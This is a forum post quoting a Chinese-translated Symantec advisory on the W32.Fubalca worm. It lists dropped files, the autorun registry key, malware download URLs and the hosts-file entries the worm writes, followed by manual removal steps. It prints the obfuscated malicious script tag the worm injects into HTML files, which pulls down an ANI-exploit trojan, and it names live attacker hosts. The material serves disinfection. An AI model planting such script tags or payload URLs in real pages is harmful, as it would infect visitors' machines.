[电脑] 帮忙看看咋回事？有图

http://hi.baidu.com/teyqiu/blog/ ... a68e086b63e5a6.html
看看这个

狀況說明

W32.Fubalca是一隻藉由可攜式儲存裝置和感染.exe, .html檔案來擴散的病毒。

病毒執行後，它會建立下列的檔案：

%System%\sysload3.exe
%System%\tempIcon.exe
%System%\[RANDOM FILE NAME].tmp
%System%\tempload.exe

接著病毒會在A到Z的儲存裝置的根目錄複製下列的檔案：

tool.exe
autorun.ind

接著病毒會建立下列的機碼以至於每次Windows系統啟動時會自動執行病毒：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"System Boot Check" = "%SYSTEM%\sysload3.exe"

它會寫入程式碼到notepad.exe和IExplore.exe。

病毒會企圖從下列URL下載一個設定檔：

[http://]a.2007ip.com/css[REMOVED]

病毒接著會下載並執行設定檔所列之檔案。在寫入的同時，它會從下列URLs下載檔案：

[http://]61.153.247.76/cald/01.[REMOVED]
[http://]61.153.247.76/cald/02.[REMOVED]
[http://]61.153.247.76/cald/03.[REMOVED]
[http://]61.153.247.76/cald/04.[REMOVED]
[http://]61.153.247.76/cald/05.[REMOVED]
[http://]61.153.247.76/cald/06.[REMOVED]
[http://]61.153.247.76/cald/07.[REMOVED]

這些檔案是Infostealer.Gampass 或 Infostealer.Perfwo的複製檔。

這個設定檔也包含這個URL [http://]if.iloveck.com/test/hos[REMOVED]，它會取代host 檔：

127.0.0.1 localhost
127.0.0.1 mmm.caifu18.net
127.0.0.1 www.18dmm.com
127.0.0.1 d.qbbd.com
127.0.0.1 www.5117music.com
127.0.0.1 www.union123.com
127.0.0.1 www.wu7x.cn
127.0.0.1 www.54699.com
127.0.0.1 60.169.0.66
127.0.0.1 60.169.1.29
127.0.0.1 www.97725.com
127.0.0.1 down.97725.com
127.0.0.1 ip.315hack.com
127.0.0.1 ip.54liumang.com
127.0.0.1 www.41ip.com
127.0.0.1 xulao.com
127.0.0.1 www.heixiou.com
127.0.0.1 www.9cyy.com
127.0.0.1 www.hunll.com
127.0.0.1 www.down.hunll.com
127.0.0.1 do.77276.com
127.0.0.1 www.baidulink.com
127.0.0.1 adnx.yygou.cn
127.0.0.1 222.73.220.45
127.0.0.1 www.f5game.com
127.0.0.1 www.guazhan.cn
127.0.0.1 wm,103715.com
127.0.0.1 www.my6688.cn
127.0.0.1 i.96981.com
127.0.0.1 d.77276.com
127.0.0.1 www1.cw988.cn
127.0.0.1 cool.47555.com
127.0.0.1 www.asdwc.com
127.0.0.1 55880.cn
127.0.0.1 61.152.169.234
127.0.0.1 cc.wzxqy.com
127.0.0.1 www.54699.com

它也會感染下列副檔名的所有檔案，除了Windows所在的磁碟區(e.g. C:\)：

exe
asp
jsp
php
htm
aspx
html

被感染的.html檔會包含下列javascript：

<script language="javascript" src="[http://]%6D%61%63%72%2E%6D%69%63%72% 6F%66%
73% 6F%74%2E%63% 6F%6D/Noind[REMOVED]"></script>

這個javascript會增加一個包含下列URL的<div> tag

[http://]macr.microfsot.com/Adm[REMOVED]. This will download a copy of Trojan.Anicmoo, which exploits the Microsoft Windows Cursor And Icon ANI Format Handling Remote Buffer Overflow Vulnerability (BID 23194) and downloads the worm body from [http://]a.2007ip.com/5949645[REMOVED].

病毒會建立一個mutex為"MyInfect"

移除方式

1. 關閉「系統還原」(Windows Me/XP)。

2. 移除病毒加入host檔的entries。

3. 更新病毒定義檔。

4. 執行完整的系統掃描。

5. 刪除新增到機碼的數值。

關於這些步驟的詳細資訊，請閱讀下列指示：

1. 關閉「系統還原」(Windows Me/XP)。

如果你使用的是Windows Me或Windows XP，我們建議你暫時關閉系統還原。Me或XP預設是打開這項功能的，回復這些檔案可能造成她們的損壞。如果是病毒，蠕蟲，或木馬感染了電腦，系統還原有可能備份這些檔案。

Windows預防外來的程式，包括防毒軟體修改系統還原。因此防毒軟體或工具無法移除系統還原資料夾裡面的威脅。因此即使你在其他的地方刪除了有感染的檔案，系統還原還是有可能存有受感染的檔案。

此外，病毒掃描可能會偵測到威脅在系統還原的資料夾即使你早就宜除了威脅。

至於如何關閉作業系統上的系統還原功能可閱讀本機的Windows說明文件或參照下列鏈結裡的說明:

l          "如何開啟或關閉Windows ME的系統還原功能"(英文)

l          "如何開啟或關閉WindowsXP上的系統還原功能"(英文)

注意：如果你完成了移除威脅的程序，請重起系統還原。

如果想要獲得額外的資訊，和另一種關閉Windows Me的系統還原，你可以查閱微軟知識庫的文章：Antivirus Tools Cannot Clean Infected Files in the _Restore Folder (Article ID: Q263455).

2. 移除病毒加入host檔的entries。

a. 指到下列位置：

·  Windows 95/98/Me:
%Windir%

·  Windows NT/2000/XP:
%Windir%\System32\drivers\etc

Notes:

·  The location of the hosts file may vary and some computers may not have this file. There may also be multiple copies of this file in different locations. If the file is not located in these folders, search your disk drives for the hosts file, and then complete the following steps for each instance found.

·  %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows (Windows 95/98/Me/XP) or C:\Winnt (Windows NT/2000).

b. 雙擊host檔。

c. 如果有必要，取消選取"Always use this program to open this program"這個選項

d. 用Notepad開啟host檔。

e. 刪除病毒所加的所有entries。

f. 結束Notepad並存檔。

3. 更新病毒定義檔

Symantec Security Response對於所有在網站上公佈的病毒定義檔都有做完整的測試。有兩種方式可以獲得病毒定義檔。

l          執行LiveUpdate，這是一個較容易的方法取得病毒定義檔。

l          如果你使用Norton AntiVirus 2006，Symantec AntiVirus Corporate Edition 10.0，或更新的產品，LiveUpdate將會是每日更新。這些產品擁有更新的技術。

l          如果你使用Norton AntiVirus 2005，Symantec AntiVirus Corporate Edition 9.0，或較早的產品，LiveUpdate將會是每週更新。major outbreaks是例外，他會更新的稍微頻繁一點。

l          藉由Intelligent Updater下載定義：Intelligent Updater病毒定義是每日更新。你應該從Symantec Security Response網站下載定義並手動更新它們。Intelligent Updater提供了這些威脅的定義，在Virus Definitions (Intelligent Updater)。

最新的Intelligent Updater virus definitions可以在這裡找到：Intelligent Updater virus definitions。想要知道詳細的資料可以閱讀下列文件：How to update virus definition files using the Intelligent Updater。

4. 執行完整的系統掃描。

a. 執行您的Symantec antivirus並確定其設定為掃描所有的檔案。

l          Norton AntiVirus consumer products:請閱讀下列文件：How to configure Norton AntiVirus to scan all files

l          Symantec AntiVirus Enterprise products: 請閱讀下列文件：How to verify that a Symantec Corporate antivirus product is set to scan all files

b. 執行全系統掃瞄。

c. 如果有發現任何檔案，用您的防毒軟體執行下列動作。

重要：如果您的軟體無法刪除檔案，你可以試著進入安全模式去停止風險檔案。讀下列文件了解詳細：How to start the computer in Safe Mode。依但您進入安全模式，試著重新掃描一次。

刪除檔案後，在普通模式重起電腦並執行下一段的動作。

如果威脅並未完全地移除，電腦重起後可能會有警告訊息。你可以忽略訊息並按確定。這些訊息當你完全執行所有的一除病毒動作將部會再出現。訊息可能如下：

Title: [FILE PATH]
Message body: Windows cannot find [FILE NAME]. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button, and then click Search.

5. 刪除新增到機碼的數值。

重要：Symantec強烈建議您更改機碼前先備份它。更改錯誤可能會造成資料遺失或檔案毀損。這裡只更改特定的機碼。可以參考以下文件：How to make a backup of the Windows registry.

a. 按下「開始」，然後按下「執行」。

b. 輸入 regedit 然後按下「確定」。

c. 按下「確定」。

注意：您可能要為了預防進入機碼編輯器而更改機碼如果您試圖用機碼編輯器打開威脅失敗。Security Response建置了一個tool可以解決。下載並執行這個tool，並繼續移除程序。

d. 指到並刪除下列機碼：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"System Boot Check" = "%System%\sysload3.exe"

e. 關閉機碼編輯器。